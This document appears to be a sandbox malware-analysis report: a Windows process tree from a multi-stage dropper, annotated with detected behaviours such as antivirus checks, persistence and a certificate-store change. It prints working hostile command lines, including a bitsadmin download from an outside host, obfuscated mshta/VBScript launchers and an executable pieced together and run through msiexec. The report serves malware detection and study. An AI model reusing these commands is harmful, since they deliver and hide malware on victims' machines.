[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
  - Blocklisted process makes network request
  - Checks for any installed AV software in registry
  - Suspicious use of SetWindowsHookEx
[depth 12] C:\Windows\SysWOW64\bitsadmin.exe
  "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
  - Download via BitsAdmin
[depth 13] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - Loads dropped DLL
[depth 12] C:\Program Files (x86)\lighteningplayer\data_load.exe
  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pcKaq2Eq28KXYPtY -y x C:\zip.7z -o"C:\Program Files\temp_files\"
[depth 12] C:\Program Files (x86)\lighteningplayer\data_load.exe
  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pIpp1OPsBdTop3OU -y x C:\zip.7z -o"C:\Program Files\temp_files\"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi5A9E.tmp\tempfile.ps1"
[depth 12] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 9348 -s 1216
  - Program crash
[depth 10] C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oax0ui1q.saj\installer.exe /qn CAMPAIGN=654 & exit
[depth 11] C:\Users\Admin\AppData\Local\Temp\oax0ui1q.saj\installer.exe
  C:\Users\Admin\AppData\Local\Temp\oax0ui1q.saj\installer.exe /qn CAMPAIGN=654
[depth 6] C:\Users\Admin\Pictures\Adobe Films\VQkGBnO_XmTtKCVqhBHSUro2.exe
  "C:\Users\Admin\Pictures\Adobe Films\VQkGBnO_XmTtKCVqhBHSUro2.exe"
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
[depth 7] C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of SetWindowsHookEx
[depth 8] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
[depth 9] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x278,0x238,0x234,0x244,0x230,0x7ffb789adec0,0x7ffb789aded0,0x7ffb789adee0
[depth 10] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff7d98a9e70,0x7ff7d98a9e80,0x7ff7d98a9e90
[depth 9] C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,2415241214401970410,9284425442218525090,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9880_912709918" --mojo-platform-channel-handle=1664 /prefetch:8
[depth 4] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe
[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1481f5a7e3eccdd.exe
  Sat1481f5a7e3eccdd.exe
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
[depth 6] C:\Users\Admin\AppData\Local\Temp\is-TMI9K.tmp\Sat1481f5a7e3eccdd.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-TMI9K.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$C0068,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1481f5a7e3eccdd.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
[depth 7] C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1481f5a7e3eccdd.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1481f5a7e3eccdd.exe" /SILENT
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
[depth 8] C:\Users\Admin\AppData\Local\Temp\is-L927T.tmp\Sat1481f5a7e3eccdd.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-L927T.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$10250,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1481f5a7e3eccdd.exe" /SILENT
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
[depth 9] C:\Users\Admin\AppData\Local\Temp\is-Q00PB.tmp\postback.exe
  "C:\Users\Admin\AppData\Local\Temp\is-Q00PB.tmp\postback.exe" ss1
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
[depth 4] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe
[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14a7594cc5a0116.exe
  Sat14a7594cc5a0116.exe
[depth 4] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe
[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1427fbafcf251.exe
  Sat1427fbafcf251.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
[depth 6] C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1427fbafcf251.exe
  C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1427fbafcf251.exe
  - Executes dropped EXE
[depth 4] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe
[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14b47e86b9c16b.exe
  Sat14b47e86b9c16b.exe
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
[depth 6] C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
[depth 7] C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im chrome.exe
  - Kills process with taskkill
[depth 4] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe
[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat144474a564d26f29.exe
  Sat144474a564d26f29.exe
  - Executes dropped EXE
  - Checks computer location settings
[depth 6] C:\Users\Admin\Pictures\Adobe Films\a6a2ZQhj6hMi6OZQH8Nm4nCs.exe
  "C:\Users\Admin\Pictures\Adobe Films\a6a2ZQhj6hMi6OZQH8Nm4nCs.exe"
  - Executes dropped EXE
[depth 6] C:\Users\Admin\Pictures\Adobe Films\7PeayF9Tb5XcknwhFlZFItg1.exe
  "C:\Users\Admin\Pictures\Adobe Films\7PeayF9Tb5XcknwhFlZFItg1.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
[depth 7] C:\Users\Admin\Documents\HQ55SfKidXoRs_jbeqXyDCZL.exe
  "C:\Users\Admin\Documents\HQ55SfKidXoRs_jbeqXyDCZL.exe"
[depth 8] C:\Users\Admin\Pictures\Adobe Films\y0kMb80z9Fja4FSkWIla18kb.exe
  "C:\Users\Admin\Pictures\Adobe Films\y0kMb80z9Fja4FSkWIla18kb.exe"
[depth 8] C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe
  "C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe"
[depth 9] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
[depth 10] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\XgylPHsAOW5QAFuZHh9yeO4V.exe" ) do taskkill -f -iM "%~NxM"
[depth 11] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
[depth 11] C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
  ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
[depth 12] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
[depth 13] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
  - Blocklisted process makes network request
  - Executes dropped EXE
[depth 12] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT( "wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
[depth 13] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "XgylPHsAOW5QAFuZHh9yeO4V.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\h_tWKtjPYNuVSFdaShBLfLrO.exe"C:\Users\Admin\Pictures\Adobe Films\h_tWKtjPYNuVSFdaShBLfLrO.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6489⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6609⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6649⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6809⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 8969⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 9329⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 10849⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\57052T7m9vPnvaTi49CZopCH.exe"C:\Users\Admin\Pictures\Adobe Films\57052T7m9vPnvaTi49CZopCH.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\BMameXGTyFCpxcZ9otZTnGuy.exe"C:\Users\Admin\Pictures\Adobe Films\BMameXGTyFCpxcZ9otZTnGuy.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\ue41KJ_oVzM77L8GxPePgl1A.exe"C:\Users\Admin\Pictures\Adobe Films\ue41KJ_oVzM77L8GxPePgl1A.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\45McdKh4yEN6rqCKY0ZuGRQk.exe"C:\Users\Admin\Pictures\Adobe Films\45McdKh4yEN6rqCKY0ZuGRQk.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-L1CQ6.tmp\45McdKh4yEN6rqCKY0ZuGRQk.tmp"C:\Users\Admin\AppData\Local\Temp\is-L1CQ6.tmp\45McdKh4yEN6rqCKY0ZuGRQk.tmp" /SL5="$20172,506127,422400,C:\Users\Admin\Pictures\Adobe Films\45McdKh4yEN6rqCKY0ZuGRQk.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-S7N47.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-S7N47.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Mozilla Firefox\CHYTVKIQHN\foldershare.exe"C:\Program Files\Mozilla Firefox\CHYTVKIQHN\foldershare.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\a6-b9b70-def-72ab6-ecbeb318d062c\Baekefeletu.exe"C:\Users\Admin\AppData\Local\Temp\a6-b9b70-def-72ab6-ecbeb318d062c\Baekefeletu.exe"11⤵
- Checks computer location settings
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 219212⤵
-
C:\Users\Admin\AppData\Local\Temp\d5-2d25c-0d4-cbf86-0e6dafcefba30\Jupikoqezhae.exe"C:\Users\Admin\AppData\Local\Temp\d5-2d25c-0d4-cbf86-0e6dafcefba30\Jupikoqezhae.exe"11⤵
- Drops file in Windows directory
- Modifies system certificate store
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qzsc4oob.5sm\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\qzsc4oob.5sm\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\qzsc4oob.5sm\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9332 -s 48814⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9332 -s 88014⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9332 -s 92814⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9332 -s 109214⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uj4zmcxn.0zc\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\uj4zmcxn.0zc\installer.exeC:\Users\Admin\AppData\Local\Temp\uj4zmcxn.0zc\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zzig0djb.z31\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\zzig0djb.z31\any.exeC:\Users\Admin\AppData\Local\Temp\zzig0djb.z31\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lcqhoa43.ibg\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\lcqhoa43.ibg\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\lcqhoa43.ibg\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10212 -s 64414⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10212 -s 62014⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c4eak3tt.mjb\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\c4eak3tt.mjb\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\c4eak3tt.mjb\autosubplayer.exe /S13⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pcKaq2Eq28KXYPtY -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pIpp1OPsBdTop3OU -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\BtWbiTx\BtWbiTx.dll" BtWbiTx14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\BtWbiTx\BtWbiTx.dll" BtWbiTx15⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsk9332.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\X9CrMOGrOpPKIZqgtV8aNLBI.exe"C:\Users\Admin\Pictures\Adobe Films\X9CrMOGrOpPKIZqgtV8aNLBI.exe"8⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffb789adec0,0x7ffb789aded0,0x7ffb789adee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1472,18203654270738733627,16399146770499251545,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10916_1710923684" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1524 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1472,18203654270738733627,16399146770499251545,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10916_1710923684" --mojo-platform-channel-handle=1820 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\von6J2rHI2UgQky674Td90lo.exe"C:\Users\Admin\Pictures\Adobe Films\von6J2rHI2UgQky674Td90lo.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
